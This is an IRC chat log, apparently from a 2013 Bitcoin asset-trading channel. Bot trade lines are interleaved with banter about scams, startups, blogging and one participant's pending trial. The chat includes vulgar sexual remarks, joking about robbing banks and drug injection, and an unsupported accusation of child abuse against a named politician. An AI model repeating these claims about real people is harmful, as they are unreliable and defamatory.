Pretty much. They are the people who threw your PR in their club. Sep 25 05:42:16 o i recall her being livid on the topic Sep 25 05:42:21 lol Sep 25 05:42:38 bad pr. people just won't stop doing it already, in spite of it never working. Sep 25 05:43:22 Yeah. It was actually a different topic that started my sould searching that lead to Bingo Blog, though that group contributed to my general sentiment. Sep 25 05:44:35 jackmaninov jborkl jcpham jedunnig_ Jezzz jMyles joesmoe joeykrim jordandotdev jurov Sep 25 05:44:35 jackmaninov jborkl jcpham jedunnig_ Jezzz jMyles joesmoe joeykrim jordandotdev jurov Sep 25 05:44:41 that's by now two, jborkl also runs one Sep 25 05:44:47 jackmaninov jborkl jcpham jedunnig_ Jezzz jMyles joesmoe joeykrim jordandotdev jurov Sep 25 05:44:47 jackmaninov jborkl jcpham jedunnig_ Jezzz jMyles joesmoe joeykrim jordandotdev jurov Sep 25 05:44:49 or do you still jborkl ? Sep 25 05:44:52 What did me in was the thread that seems dead at this polite message: https://bitcointalk.org/index.php?topic=295216.msg3198725#msg3198725 Dude was too much of a scammer to even try to talk shit back Sep 25 05:45:49 [BTCTC] [LABCOIN] 1000 @ 0.00117 = 1.17 BTC [-] Sep 25 05:46:50 [HAVELOCK] [AM1] 1 @ 1.7 BTC [-] Sep 25 05:49:20 bitcointalk seems so... hurt these days. Sep 25 05:49:53 [BTCTC] [BITVPS] 165 @ 0.00140461 = 0.2318 BTC [-] {3} Sep 25 05:50:54 [HAVELOCK] [AM100] 46 @ 0.01725 = 0.7935 BTC [+] Sep 25 05:51:00 mircea_popescu: It's always hurt. It needs to stop shooting up the horse though so it realizes it hurts instead of rectally embracing larger and larger scams until sepsis Sep 25 05:51:26 im kinda curious what's next. Sep 25 05:51:31 i guess we find come spring. Sep 25 05:51:46 but anyway, the hurt these days is of a completely different feel than the hurt in oct 2012. Sep 25 05:51:55 [HAVELOCK] [AM100] 39 @ 0.01725 = 0.6728 BTC [+] Sep 25 05:52:04 back then it was big holders plucking their hair out in disbelief, quite differently flavored Sep 25 05:52:27 today it looks like a throng of kids who just had their dreams of one day being president crushed. Sep 25 05:52:56 [HAVELOCK] [AM1] 1 @ 1.7 BTC [-] Sep 25 05:53:08 i suppose with strange aeons even hurt decays. Sep 25 05:53:49 mircea_popescu: My worry is that as bitcoin appreciates against other currencies it keeps staying throngs of kids who will be replace by other throngs of kids.Roger Ver crushed by pirate was big. I worry that BTC-TC will die too quietly. Sep 25 05:53:57 [BTCTC] [ASICMINER-PT] 1 @ 1.449 BTC [+] Sep 25 05:54:19 roger ver wasn't even the largest thing crushed by pirate. he was just the loudest/more exhibitionistic. Sep 25 05:54:28 lot of tragedy behind closed doors with that one. Sep 25 05:54:58 [BTCTC] [LABCOIN] 500 @ 0.001172 = 0.586 BTC [+] Sep 25 05:55:59 [BTCTC] [ASICMINER-PT] 3 @ 1.45366666 = 4.361 BTC [+] {3} Sep 25 05:56:15 mircea_popescu: It isn't always about crushing big things... The louder things crushed should be informing the later things of the hazards of being crushed by having been crushed... Sep 25 05:56:33 well... people have this ability to dissociate. Sep 25 05:56:45 if i gut a crow and put it on a pole, the other crows will keep distance. Sep 25 05:56:55 if i gut a guy and put him up on a pole, it will attract tons of other people. Sep 25 05:58:32 Unlike crows people have chemistry though. PCP, Ketamine, other NMDA partial-agonists; Maybe people need slowed neurologically to see hazards like that withough being trapped themselves? Sep 25 05:59:17 So, 9 days until I find out if My October is going to be a very prison October... Sep 25 05:59:25 so are you saying they're doing too much or too little ? Sep 25 05:59:41 do they give wifi in your obnoxious persons holding ward ? Sep 25 06:01:30 mircea_popescu: Not sure If I get wifi, but on the internet in general, maybe we need still more drugs for the average AMAZInG COMPANY investor to soften teir brain enough to see hazards Sep 25 06:01:31 AMAZING COMPANY! Sep 25 06:02:05 [BTCTC] [ACTIVEMINING] 107 @ 0.001711 = 0.1831 BTC [+] Sep 25 06:02:20 I'm starting to think avoiding big ships is the teritorry of the extremely dull and the somewhat bright Sep 25 06:03:31 Oh shit, tomatocage is here! Sep 25 06:08:10 [BTCTC] [LABCOIN] 1800 @ 0.00115826 = 2.0849 BTC [-] {5} Sep 25 06:11:13 [HAVELOCK] [CBTC] 621 @ 0.00036898 = 0.2291 BTC [+] {2} Sep 25 06:13:05 lolwut Sep 25 06:13:38 Exactly Sep 25 06:14:37 hehe Sep 25 06:15:03 BingoBoingo where are you geographically anyway ? if it;'s not some secret Sep 25 06:15:17 [HAVELOCK] [AM100] 80 @ 0.01508625 = 1.2069 BTC [-] {2} Sep 25 06:16:03 mircea_popescu: UTC -6 I'll PM you a link to a new story related to my indictment Sep 25 06:16:18 [HAVELOCK] [AM100] 20 @ 0.01507001 = 0.3014 BTC [-] Sep 25 06:16:25 a ok. Sep 25 06:17:14 a apparently us minimum security ppl don't get internet. Sep 25 06:17:19 [MPEX] [S.MPOE] 7909 @ 0.00091608 = 7.2453 BTC [+] Sep 25 06:17:19 shouldn't that be a right by now ? Sep 25 06:18:03 Well, 8 days till the trial. Webchat seem to refuse things it used to allow.. Maybe you start the IRC messaging Sep 25 06:18:06 rights for all Sep 25 06:18:09 right Sep 25 06:18:20 [HAVELOCK] [AM100] 492 @ 0.01500557 = 7.3827 BTC [-] {11} Sep 25 06:18:51 sucks dude hope you make out ok Sep 25 06:21:18 what;'s the lawyer say anyway "? Sep 25 06:21:56 mircea_popescu: Lawyer say the 5-0 did the paperwork wrong and shouldn't be shit, but this is the most corrupt state in the union. Sep 25 06:22:58 if I were to take a guess Mississippi or Louisiana Sep 25 06:23:01 Ah florida...or texas...no wait new york! Sep 25 06:23:07 actually none are correct :D Sep 25 06:23:15 :/ Sep 25 06:24:00 KRS1 MilkyLep Wat state had its last 3 governors all face indictments? Two facing Jail time? Sep 25 06:24:30 BingoBoingo wait wait. this is the one with the weird serb isn't it! Sep 25 06:24:35 ohhhhh ok Sep 25 06:24:40 Somalia Sep 25 06:24:50 http://trilema.com/2010/milorad-blagojevici/ Sep 25 06:24:53 Milorad Blagojevici pe Trilema - Un blog de Mircea Popescu. Sep 25 06:24:57 think about it, the guy even made it on trilema! Sep 25 06:24:58 I mean Illinois Sep 25 06:25:01 two years ago. Sep 25 06:25:22 yeah that was some funny shit Sep 25 06:25:23 mircea_popescu: That would be the one. Sep 25 06:26:12 didn't he auction off obama's seat ? Sep 25 06:26:20 mircea_popescu: But before hime George Ryan shilling for other ethnic groups, Before Him Jim Edgar Sep 25 06:26:46 Blowjabavich tried to auction off the Obama seat. Sep 25 06:27:13 That was when he crossed some government can only be so corrupt line Sep 25 06:27:29 [BTCTC] [BASIC-MINING] 5 @ 0.081 = 0.405 BTC [+] Sep 25 06:28:07 it sure is like that isnt it..+1 Sep 25 06:28:30 [HAVELOCK] [B] [XBOND] 1899 @ 0.00117042 = 2.2226 BTC [-] {4} Sep 25 06:28:53 Week after I got arrested though a former classmate of mine robbed a bank and he just needs to go through alcohol counseling so I'm optomistic with my misdemeanor, because disorderly conduct should be an obligation rather than a crime Sep 25 06:29:19 maybe you should get smart and rob banks. Sep 25 06:30:40 or a bitcoin gambling site Sep 25 06:30:46 oh did i just say that Sep 25 06:30:47 mircea_popescu: Didn't work well for the former acquaintence, but then agian he was fat. Instead of "Take the Money and Run" liek the song he said it was "Take the money and walk briskly" followed by... jail stuff Sep 25 06:31:16 so basically he didn't really need the money. Sep 25 06:31:16 Briskly fat boy! Briskly! Sep 25 06:31:23 how much did he get anyway ? Sep 25 06:31:57 mircea_popescu: He took roughly $600,m he could have probably got more if his weapon wasn't a sandwich... Sep 25 06:32:35 mircea_popescu: And he was convinced he needed it because the bitch that owned him's parents... Sep 25 06:32:41 lol Sep 25 06:32:56 lmao Sep 25 06:33:06 wait he actually had a sandwich in his hand ? Sep 25 06:33:36 [BTCTC] [COGNITIVE] 2 @ 0.155 = 0.31 BTC [-] Sep 25 06:34:03 anyway, no way il is more corrupt than mass. Sep 25 06:34:16 1. big dig. 2. governor and head of local mob = brothers Sep 25 06:34:18 mircea_popescu: Yup, Subway chicken teriyaki. Sep 25 06:34:23 3. barney frank STILL touches little boys. Sep 25 06:35:55 people rob banks for $600? Sep 25 06:36:38 all the time. there were two kids trying it here last month. Sep 25 06:36:44 police beat them to shit, took them to parents. Sep 25 06:38:50 The United States has among the highest incarceration rates in the world. More people are behind bars in the United States than any other country. As of 2006, a record 7 million people were behind bars, on probation or on parole. Of the total, 2.2 million were incarcerated. The People's Republic of China ranks second with 1.5 million. The United States has 5% of the world's population and 25% of the world's incarcerate Sep 25 06:38:50 d population. Sep 25 06:39:45 mircea_popescu: Those are called reasons I'm not optomistic. Sep 25 06:40:13 yeah well.. and china has like 4-6x more population Sep 25 06:40:23 to quote -pr @ ben, "you're in prison anyway" Sep 25 06:40:56 Many states allow persons in minimum-security facilities access to the internet. Sep 25 06:41:08 apparently it got with the times. Sep 25 06:41:43 [MPEX] [S.MPOE] 3800 @ 0.00091399 = 3.4732 BTC [-] Sep 25 06:41:43 [HAVELOCK] [B] [XBOND] 1055 @ 0.00114999 = 1.2132 BTC [-] {2} Sep 25 06:50:46 So, anyone her familiar with Gliph at all? Sep 25 06:53:55 [BTCTC] [ASICMINER-PT] 5 @ 1.4472 = 7.236 BTC [-] {3} Sep 25 06:53:57 nop. Sep 25 06:54:56 [BTCTC] [ASICMINER-PT] 1 @ 1.451 BTC [+] Sep 25 06:55:40 mircea_popescu: Well That's going to be my third post on the new blog. Server side AES keys... Connects to Mixing Web Wallets, can't send BTC to BTC addresses... Sep 25 06:55:57 [BTCTC] [BASIC-MINING] 5 @ 0.075 = 0.375 BTC [+] Sep 25 06:56:58 [BTCTC] [BASIC-MINING] 18 @ 0.0735 = 1.323 BTC [-] Sep 25 06:57:29 who put up the seed ? Sep 25 06:57:59 [BTCTC] [DMS.MINING] 324 @ 0.0012001 = 0.3888 BTC [-] {4} Sep 25 06:58:19 a, the junior draper. Sep 25 06:58:47 glyph is a scam Sep 25 06:59:06 or if not a scam an ineffective thing Sep 25 06:59:17 benkay it's one of those vc things. Sep 25 06:59:27 i'm aware Sep 25 06:59:34 http://adamdraper.com/assets/adam_profile-d51740651d947583305206fad1333eff.jpeg Sep 25 06:59:59 i'd make more comments about them but i think they know somebody i already don't get along with and this is a very small town Sep 25 07:00:02 [BTCTC] [BASIC-MINING] 50 @ 0.07296 = 3.648 BTC [-] {2} Sep 25 07:00:04 "My life's ambition is to assist in the creation of an Iron Man Suit." Sep 25 07:00:20 not much more need be said. Sep 25 07:01:02 [BTCTC] [BASIC-MINING] 173 @ 0.07011802 = 12.1304 BTC [-] {3} Sep 25 07:01:19 Have you ever read the book "He's Just Not That into You"? Me neither, however I have seen the movie, and although it is lacking a whimsically charming Hugh Grant in order to make it into the "Best RomCom" category, there is one part of the movie Sep 25 07:01:45 mmh http://adamdraper.com/ http://www.bitfurystrikesback.com/ Sep 25 07:01:46 no actually, thank you internets for mentioning hre guy. Sep 25 07:02:00 dexX7 they're all bootstrap. that's why they all look the same. Sep 25 07:02:03 [HAVELOCK] [AM100] 12 @ 0.0165 = 0.198 BTC [+] Sep 25 07:02:16 the lion ;) Sep 25 07:02:35 mircea_popescu benkay: With Glyph everything is server side. AES symetrical encryption between parties should tell you all of the fail ou need. Sep 25 07:02:54 dexX7 a Sep 25 07:03:59 dat lion Sep 25 07:04:02 derp lerps Sep 25 07:04:04 ahahah this stuff is so great. http://siliconflorist.com/2012/03/02/portland-seed-fund-startups-psf/ Sep 25 07:04:10 check out the 18 startups. Sep 25 07:04:28 ”We can’t wait to realize the full potential of the creative and technological talent that already exists right here in Portland,” Sep 25 07:04:38 "when starting a company, sometimes it is difficult to understand how you should be valued, or what your value is when you are trying to raise money from investors" Sep 25 07:04:48 maybe start by making money Sep 25 07:05:06 [BTCTC] [ASICMINER-PT] 2 @ 1.4395 = 2.879 BTC [-] {2} Sep 25 07:05:18 love how indow windows is a "startup" Sep 25 07:05:35 didn't know you were allowed to call companies that shoveled atoms "startups" Sep 25 07:06:20 these aren't companies tho. this is the vc freakshow circuit. Sep 25 07:06:40 it's just a risk pool Sep 25 07:06:43 get a coupla camwhores through 6 weeks buzzword programme and send them to collect the money of the foolish Sep 25 07:06:45 dudes are just buying some risk Sep 25 07:07:01 no, they aren't. dudes are buying by the hour a particular sort of entertainment Sep 25 07:07:09 [BTCTC] [DMS.MINING] 500 @ 0.001155 = 0.5775 BTC [-] Sep 25 07:07:14 you know how any brothel worth its salt allows you to act out your fantasies ? Sep 25 07:07:15 If Portland wants investment they have to hide the trackmarks. Sep 25 07:07:28 this is that, except outpatient, you get to pretend luike you're rich and a bunch of twinks really want your cock. Sep 25 07:08:28 .d Sep 25 07:08:29 112628548.66635 | Next Diff in 101 blocks | Estimated Change: 30.5369% in 0d 11h 45m 10s Sep 25 07:09:24 in portland trackmarks increase your valuation Sep 25 07:09:37 the tickets are to a better show, so to speak. Sep 25 07:10:23 benkay: Increase valuation of what? carried strains of Hep C? Sep 25 07:10:44 context implied Sep 25 07:11:05 only street people have diseases Sep 25 07:11:43 needles aren't that cheap Sep 25 07:11:49 er Sep 25 07:11:51 benkay: When you live on the farm most people look like street people... Sep 25 07:11:52 expensive Sep 25 07:11:55 anyway, it must really suck to be a vapid airhead stuck in the brood of some guy who seeded skype and whatnot. Sep 25 07:12:02 and trying to follow into daddy's footsteps. Sep 25 07:12:30 benkay: and needles aren't that cheap when the pharmacist has the DEA breathing down their neck Sep 25 07:12:47 aren't needles free anymore ?! Sep 25 07:12:53 oh probably Sep 25 07:13:08 but that twenty minutes is better spent promoting another fiver for ones habit Sep 25 07:13:33 mircea_popescu: Not in 'Murica outside seatle Sep 25 07:14:00 i'm sure the hippies provide them here, doing the lord's charity Sep 25 07:14:08 "nobody should have to get high and die" Sep 25 07:14:19 isn't that part of the point of the lethality of such bad habits? Sep 25 07:14:25 mircea_popescu needles aren't free that's why i live on $1 ramen every day Sep 25 07:14:32 needles too 'spensive in MURICA Sep 25 07:15:50 I swear the funniest are the lower division college athletes who get insulin needles,because those don't fo deep enough to spread the roids right round Sep 25 07:21:23 [MPEX] [S.MPOE] 3905 @ 0.00091399 = 3.5691 BTC [-] Sep 25 07:23:14 Whatever happened to assbot relaying AMAZING COMPANY trades, or at least Diablo_D3 trolling with paleo? Sep 25 07:23:15 AMAZING COMPANY! Sep 25 07:23:27 or tiberius Sep 25 07:23:46 as for the first i imagine tptb said something to the programmers Sep 25 07:24:05 as for Diablo_D3, he got his feelings hurt one day and hasn't been terribly around Sep 25 07:24:10 ;;seen Diablo_D3 Sep 25 07:24:10 I have not seen Diablo_D3. Sep 25 07:24:16 ;;seen DiabloD3 Sep 25 07:24:16 DiabloD3 was last seen in #bitcoin-assets 13 hours, 51 minutes, and 11 seconds ago: damned spooks Sep 25 07:24:57 ;;seen-distribution DiabloD3 Sep 25 07:24:57 Error: "seen-distribution" is not a valid command. Sep 25 07:25:02 that'd be handy Sep 25 07:25:39 ;; seen usagi Sep 25 07:25:40 usagi was last seen in #bitcoin-assets 1 day, 19 hours, 41 minutes, and 57 seconds ago: order placement is choppy when it's up Sep 25 07:28:12 we need a bitcoin's tussaud Sep 25 07:39:41 [BTCTC] [ASICMINER-PT] 5 @ 1.45179999 = 7.259 BTC [+] {4} Sep 25 07:40:42 [BTCTC] [DMS.MINING] 134 @ 0.0012 = 0.1608 BTC [+] Sep 25 07:40:42 [BTCTC] [ACTIVEMINING] 496 @ 0.001565 = 0.7762 BTC [-] Sep 25 07:40:42 [MPEX] [S.MPOE] 1984 @ 0.00091 = 1.8054 BTC [-] Sep 25 07:42:43 [BTCTC] [ACTIVEMINING] 496 @ 0.00156525 = 0.7764 BTC [+] {2} Sep 25 07:43:43 I wonder as I wander out under the sky, has burnside be-en Mirandized? Sep 25 07:45:46 [BTCTC] [LABCOIN] 4798 @ 0.00115486 = 5.541 BTC [-] {7} Sep 25 07:48:38 For poor On'ry people on BTC-TC, I wander as I wonder... Out under the sky Sep 25 07:49:28 When Mary birthed Jesus the placenta had stank, with wise men and farmers a gang bang commenced Sep 25 07:50:21 But High from the block chain a bitcoin did fall, and the promise of Satoshi I did then recall Sep 25 07:51:13 If Jebus had wanted for any wee thing, Bitvisotor credits or some other dusty thing Sep 25 07:52:01 Or all of the Buttcoins in a gallery did ring, It surely could be had 'cause Burnside is not king Sep 25 07:52:25 I wonder as I wander out under the sky, has burnside be-en Mirandized? Sep 25 07:53:28 How satoshi the inventor has not been scrutinized, escaping Obama's old people in their state care. Sep 25 07:53:45 i wander as I wonder? Out under the sky Sep 25 07:55:24 Hello all, I'm just lurking from the office while I work. Sep 25 07:56:58 [BTCTC] [DMS.MINING] 1000 @ 0.00110358 = 1.1036 BTC [-] {6} Sep 25 07:57:42 lol Sep 25 07:57:44 hi jumpy. Sep 25 07:57:59 [BTCTC] [ACTIVEMINING] 308 @ 0.001562 = 0.4811 BTC [-] Sep 25 07:57:59 [MPEX] [S.MPOE] 4500 @ 0.00091318 = 4.1093 BTC [+] Sep 25 07:59:00 [BTCTC] [DMS.MINING] 1000 @ 0.0011 = 1.1 BTC [-] {2} Sep 25 08:02:03 [BTCTC] [DMS.MINING] 9555 @ 0.00104663 = 10.0005 BTC [-] {8} Sep 25 08:03:04 [BTCTC] [DMS.MINING] 462 @ 0.00101691 = 0.4698 BTC [-] {4} Sep 25 08:06:07 [BTCTC] [ASICMINER-PT] 5 @ 1.4256 = 7.128 BTC [-] {4} Sep 25 08:07:08 [BTCTC] [LABCOIN] 4000 @ 0.00113189 = 4.5276 BTC [-] {4} Sep 25 08:09:10 [BTCTC] [ASICMINER-PT] 3 @ 1.45033333 = 4.351 BTC [+] {2} Sep 25 08:10:11 [BTCTC] [BASIC-MINING] 5 @ 0.0701 = 0.3505 BTC [-] Sep 25 08:10:11 [BTCTC] [ASICMINER-PT] 5 @ 1.4502 = 7.251 BTC [-] {2} Sep 25 08:11:12 [BTCTC] [ASICMINER-PT] 15 @ 1.46713331 = 22.007 BTC [+] {8} Sep 25 08:12:13 [BTCTC] [BITVPS] 299 @ 0.00179354 = 0.5363 BTC [+] {4} Sep 25 08:17:18 [BTCTC] [BITVPS] 100 @ 0.0019 = 0.19 BTC [+] Sep 25 08:17:18 [MPEX] [S.MPOE] 6950 @ 0.00091336 = 6.3479 BTC [+] {3} Sep 25 08:21:02 http://img.gawkerassets.com/img/19104iqfifvg6gif/original.gif Sep 25 08:21:33 benkay: Lol balds... Sep 25 08:24:25 [BTCTC] [LABCOIN] 500 @ 0.00112802 = 0.564 BTC [-] {4} Sep 25 08:26:09 mircea_popescu: http://mashable.com/2013/06/19/john-mcafee-uninstalls-software/ Sep 25 08:27:10 also mircea_popescu: http://www.urbit.org/2013/08/22/Chapter-6-security.html Sep 25 08:30:49 Rather, require every serious content buyer to post a creative bond. If his files are found on a sharing network, he gets a bill and the informer gets a reward. This will have a rapid, lethal effect on the “culture of sharing.” Sep 25 08:37:19 So... BingoBlog now has a third post. At this current pace of 117 unique visitors within 19 hours of the first post during a soft launch (i.e. I've only linked it here and CoinChat, MP linked it on trilema and I'm not spamming bitcointalk with it yet) BingoBlog might be one of the fastest growing blogs in the BTC space. I want some comments here: http://www.thedrinkingrecord.com/2013/09/24/anti-bitcoin-bitcoin-apps/ concer Sep 25 08:37:28 or not (they are anti-bitcoin) Sep 25 08:37:38 [MPEX] [S.MPOE] 5500 @ 0.00091044 = 5.0074 BTC [-] Sep 25 08:39:40 [BTCTC] [DMS.MINING] 150 @ 0.001 = 0.15 BTC [-] {2} Sep 25 08:41:42 [BTCTC] [FN] [DMS.SELLING] 19 @ 0.00675 = 0.1283 BTC [-] Sep 25 08:44:08 benkay i think someone had that link here a day or two ago Sep 25 08:44:48 lol BingoBoingo it's not about speed, it's about duration. Sep 25 08:45:46 mircea_popescu: Yeah. Duration is why I'm breaking anti-bitcoin "bitcoin-apps" into three or four parts. Sep 25 08:45:49 also, the "watermark" bs was tried by adobe, as well as by the porn industry. it fails to work. Sep 25 08:46:18 Watermark? Is ther something I have to kill out of the theme? Sep 25 08:46:49 the notion that it's "Antisocial" to help people evade their local laws is scandalous. Sep 25 08:47:28 so what, i'm not helping the soviets overthrow their illegitimate govt in the 80s, i'm not helping americans overthrow their illegitimate govt today because "it's antisocial" ?! Sep 25 08:47:31 it'd be antisocial not to. Sep 25 08:48:29 Hmmm... I don't see having written that yet... Sep 25 08:48:48 [BTCTC] [FN] [DMS.SELLING] 59 @ 0.00661089 = 0.39 BTC [-] {3} Sep 25 08:48:59 it was from the urbit thing benkay keeps spamming for some obscure reason Sep 25 08:49:31 BingoBoingo by the way, the #1 thing you could do for your blog atm is coming out with your own identity. Sep 25 08:49:39 cover your trial in an extensive manner. Sep 25 08:51:28 also get a footnotes plugin and a recent comments thing. Sep 25 08:51:59 mircea_popescu: the social relationship is between the individual who issued your address on the network and whoever thinks you need to shut up Sep 25 08:52:10 eg your liege lord and mine Sep 25 08:52:16 herp. Sep 25 08:52:25 it's a joke about power Sep 25 08:52:30 society is an emergent phenomena. it does not allow definition by interested parties. Sep 25 08:52:43 mircea_popescu: I have the IRL identity on the blog planned on a roughly 1-3 year timeline. Doing it in less than 1 year Might be sudden, but if it isn't out in 3 then why the fuck am I blogging. I don't plan pseudonymity forever, but I am actively considering more favorable jurisdictions to settle in. Sep 25 08:53:16 the why the fuck am i blogging point is sound. Sep 25 08:53:56 obviously judging the other side is your domain, but i don't see why i'd want to live in a world wherein i can't say my name on my own blog. either such a world doesn't exist or i don't, and the sooner we find out the better. Sep 25 08:55:10 mircea_popescu: The staying out of jail point is also of some concern... I imagine safe places in this world exist to throw out a name, but... 'Murica Sep 25 08:55:39 myeah. sucks. Sep 25 08:59:34 mircea_popescu: I've already thrown my IRL name to you at least twice though. Once this spring during the ascension once I felt I knew who mattered and again tonight because... I liek reafirming things and a bit of google can take you to an alleged recording I have been advised by counsel to avoid listening to (depending on how next week goes that might be free and clear though, after the alleged speech crime is ajudicated) Sep 25 09:00:00 [BTCTC] [FN] [DMS.SELLING] 500 @ 0.00660988 = 3.3049 BTC [-] {2} Sep 25 09:00:00 [BTCTC] [DMS.MINING] 316 @ 0.00108 = 0.3413 BTC [+] Sep 25 09:00:00 [BTCTC] [ASICMINER-PT] 6 @ 1.48533333 = 8.912 BTC [+] {3} Sep 25 09:01:01 [BTCTC] [FN] [DMS.SELLING] 600 @ 0.00642465 = 3.8548 BTC [-] {4} Sep 25 09:01:13 well sure, not why i was saying. Sep 25 09:01:26 it just puts one in a particularly comfortable and solid mental place to be themselves. Sep 25 09:04:22 mircea_popescu: Yeah. Basicaally if I keep the blog up an identity release is planned. If not though the local sheriff imagining me as a minor Burside would probably be a contributing factor, a lack of my denying to release an identity later ought to probably be construed as that. Sep 25 09:07:44 After next week I might be able to GPG or address sign a kill switch statement to that effect, if I won't publically connect my identities by XX date Lex pressure is probably a contributing factor, but I should be in a moar tolerant jurisdiction by then as everyone is a tourist nowadays. Sep 25 09:10:02 lol did you read that one ? Sep 25 09:10:22 mircea_popescu: Yeah Sep 25 09:10:28 cool beans Sep 25 09:12:05 mircea_popescu: What I lack in actually knowledge of Romanian I substitute Google translate and the idea that Spanish grammar has to be moar right than the shit Google spits out organizing words Sep 25 09:12:36 yeah. well ga is hysterically funny upon occasion Sep 25 09:12:52 so at leas there's that. but i guess i should have the thing translated one of these days. Sep 25 09:13:49 mircea_popescu: I've though about offering my horrific translations in the comments of your old articles as you cite them. Sep 25 09:14:17 can't hurt anything Sep 25 09:14:29 maybe it'll shame some of the native speaker readers into doing a better jhob Sep 25 09:14:58 either way i guess i have this awesome bonus that if i ever run out of shit to write i can spend years just translating old stuff Sep 25 09:16:48 I might start that then. Worst case in a few months to a year it might be a holy shit I understand this language moment, and then I can work for Microsoft installing those exploits. Sep 25 09:17:10 lol Sep 25 09:17:33 romanian is a great language to learn because if you're talking to a hot white chick it's 33% she's romanian Sep 25 09:17:46 learn that and russian, you can always dropkick teh gorgeous babes right into your bed. Sep 25 09:18:18 [BTCTC] [ASICMINER-PT] 12 @ 1.4375 = 17.25 BTC [-] {4} Sep 25 09:18:20 Google Translate seems to beat Bing translate in most languages except romanian. Bing translate knew climbing up the mountain was uploading, but I didn't trust it. Sep 25 09:18:38 haha Sep 25 09:19:09 apparently ms has a lot of in house expertise in romanian. Sep 25 09:20:12 Yeah MS does, I think it is the third or something most common native language of people working for them in redmon trying to remember off the top of my head Sep 25 09:20:42 As I wrap my head around a european language being classed as native Sep 25 09:23:23 [BTCTC] [LABCOIN] 3000 @ 0.0011515 = 3.4545 BTC [+] {2} Sep 25 09:24:38 I can't wait till the end of season baseball bitbets pay out. I don't think I have anything outstanding there as amazing as the S.BBET vs S.DICE wager I placed, but I don't care enough to look that shit up. Sep 25 09:24:39 AMAZING COMPANY! Sep 25 09:28:25 italics are no good generally. Sep 25 09:30:26 Yeah, fuck it I'll put it on tomorrow's todo list. Sep 25 09:31:49 Laptop fan finally can in so I probably ought to throw that on the list as well. Sep 25 10:07:06 [MPEX] [S.MPOE] 9700 @ 0.00091497 = 8.8752 BTC [+] {2} Sep 25 10:18:17 [BTCTC] [FN] [DMS.SELLING] 400 @ 0.00630649 = 2.5226 BTC [-] {6} Sep 25 10:20:19 [BTCTC] [COGNITIVE] 1 @ 0.155 BTC [-] Sep 25 10:24:23 [BTCTC] [ASICMINER-PT] 1 @ 1.433 BTC [-] Sep 25 10:25:24 [BTCTC] [ASICMINER-PT] 1 @ 1.434 BTC [+] Sep 25 10:28:27 [BTCTC] [LABCOIN] 400 @ 0.0012005 = 0.4802 BTC [+] {2} Sep 25 10:30:29 [MPEX] [S.MPOE] 19296 @ 0.00091028 = 17.5648 BTC [-] {3} Sep 25 10:35:19 *hanbot* your landlord just called to say she ne4eds the electricity index from you, and to please either call or send it to her. she needs it by the 30th Sep 25 10:36:48 *hanbot* & ir back to beds Sep 25 10:39:38 [BTCTC] [ASICMINER-PT] 5 @ 1.4328 = 7.164 BTC [-] {3} Sep 25 10:41:40 [BTCTC] [CRYPTO-TRADE] 30 @ 0.1511 = 4.533 BTC [+] Sep 25 10:51:05 ;;bc,stats Sep 25 10:51:07 Current Blocks: 260003 | Current Difficulty: 1.1262854866634709E8 | Next Difficulty At Block: 260063 | Next Difficulty In: 60 blocks | Next Difficulty In About: 6 hours, 59 minutes, and 25 seconds | Next Difficulty Estimate: 148039304.055 | Estimated Percent Change: 31.4403 Sep 25 10:56:55 [MPEX] [S.MPOE] 9750 @ 0.0009104 = 8.8764 BTC [+] Sep 25 10:58:57 [BTCTC] [ASICMINER-PT] 2 @ 1.4325 = 2.865 BTC [-] {2} Sep 25 11:03:01 [BTCTC] [LABCOIN] 1000 @ 0.00120374 = 1.2037 BTC [+] {4} Sep 25 11:10:08 [BTCTC] [LABCOIN] 3018 @ 0.00120654 = 3.6413 BTC [+] {3} Sep 25 11:20:18 [BTCTC] [LABCOIN] 3000 @ 0.00119753 = 3.5926 BTC [-] {4} Sep 25 11:21:19 [BTCTC] [LABCOIN] 400 @ 0.001208 = 0.4832 BTC [+] Sep 25 11:29:27 ;;nethash Sep 25 11:29:28 1197552.05667 Sep 25 11:58:56 [BTCTC] [DMS.MINING] 2090 @ 0.00109397 = 2.2864 BTC [+] {2} Sep 25 11:59:57 [BTCTC] [DMS.MINING] 2534 @ 0.00119915 = 3.0386 BTC [+] {2} Sep 25 12:00:58 [BTCTC] [DMS.MINING] 455 @ 0.00129589 = 0.5896 BTC [+] {2} Sep 25 12:01:59 [BTCTC] [DMS.MINING] 374 @ 0.001296 = 0.4847 BTC [+] Sep 25 12:05:02 [BTCTC] [DMS.MINING] 939 @ 0.0012 = 1.1268 BTC [-] Sep 25 12:11:08 [MPEX] [S.MPOE] 7824 @ 0.00091162 = 7.1325 BTC [+] Sep 25 12:28:25 [MPEX] [S.MPOE] 3500 @ 0.0009104 = 3.1864 BTC [-] Sep 25 12:46:44 [MPEX] [S.MPOE] 14150 @ 0.00091443 = 12.9392 BTC [+] {2} **** BEGIN LOGGING AT Wed Sep 25 21:32:38 2013 Sep 25 21:32:40 [BTCTC] [BASIC-MINING] 20 @ 0.07409999 = 1.482 BTC [-] {3} Sep 25 21:33:41 [BTCTC] [ASICMINER-PT] 4 @ 1.4325 = 5.73 BTC [-] {3} Sep 25 21:37:45 [BTCTC] [LABCOIN] 292 @ 0.001249 = 0.3647 BTC [+] {2} Sep 25 21:40:48 [BTCTC] [LABCOIN] 1947 @ 0.001249 = 2.4318 BTC [+] Sep 25 21:45:53 [BTCTC] [ASICMINER-PT] 5 @ 1.433 = 7.165 BTC [+] {2} Sep 25 21:47:55 [BTCTC] [LABCOIN] 219 @ 0.00125 = 0.2738 BTC [+] Sep 25 21:48:56 [BTCTC] [ACTIVEMINING] 900 @ 0.001418 = 1.2762 BTC [-] Sep 25 21:49:57 [BTCTC] [LABCOIN] 1121 @ 0.00125097 = 1.4023 BTC [+] {2} Sep 25 21:50:58 [BTCTC] [ASICMINER-PT] 2 @ 1.432 = 2.864 BTC [-] Sep 25 21:50:59 [BTCTC] [LABCOIN] 1668 @ 0.00125065 = 2.0861 BTC [-] {2} Sep 25 21:55:30 someone sold >2M of S.MPOE too :) Sep 25 21:56:17 o hey. Sep 25 21:56:24 $vwap s.mpoe Sep 25 21:56:25 mircea_popescu: S.MPOE 1 day: average: 0.00080275 high: 0.00092746 low: 0.0007725 volume: 2278203 btc: 1828.81759561 7 day: average: 0.00084184 high: 0.00094307 low: 0.0007725 volume: 3335113 btc: 2807.61773591 30 day: average: 0.0008708 high: 0.00094307 low: 0.0007725 volume: 10779491 btc: 9386.80341687 Sep 25 21:59:06 [MPEX] [S.MPOE] 14300 @ 0.00079361 = 11.3486 BTC [-] Sep 25 22:00:39 I think assbot was out of the office when those trades happened. Sep 25 22:07:40 impossibru! Sep 25 